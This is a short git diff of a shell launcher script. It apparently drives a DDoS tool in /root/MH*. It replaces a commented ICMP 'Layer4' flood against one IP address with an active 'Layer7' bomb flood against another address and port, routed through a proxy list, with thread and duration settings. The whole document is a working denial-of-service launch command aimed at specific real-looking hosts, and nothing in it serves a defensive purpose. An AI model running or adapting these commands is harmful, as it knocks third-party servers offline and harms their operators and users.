diff --git a/start.sh b/start.sh index 3c53446..35a3ac3 100644 --- a/start.sh +++ b/start.sh @@ -1,3 +1,8 @@ #!/bin/bash cd /root/MH* -#python3 start.py STRESS 188.43.238.65 50 60 true \ No newline at end of file +#Layer4 +#python3 start.py ICMP 188.43.238.65 50 60 true + + +#Layer7 +python3 start.py bomb 80.249.131.87:20000 0 50 proxy.txt 100 60 \ No newline at end of file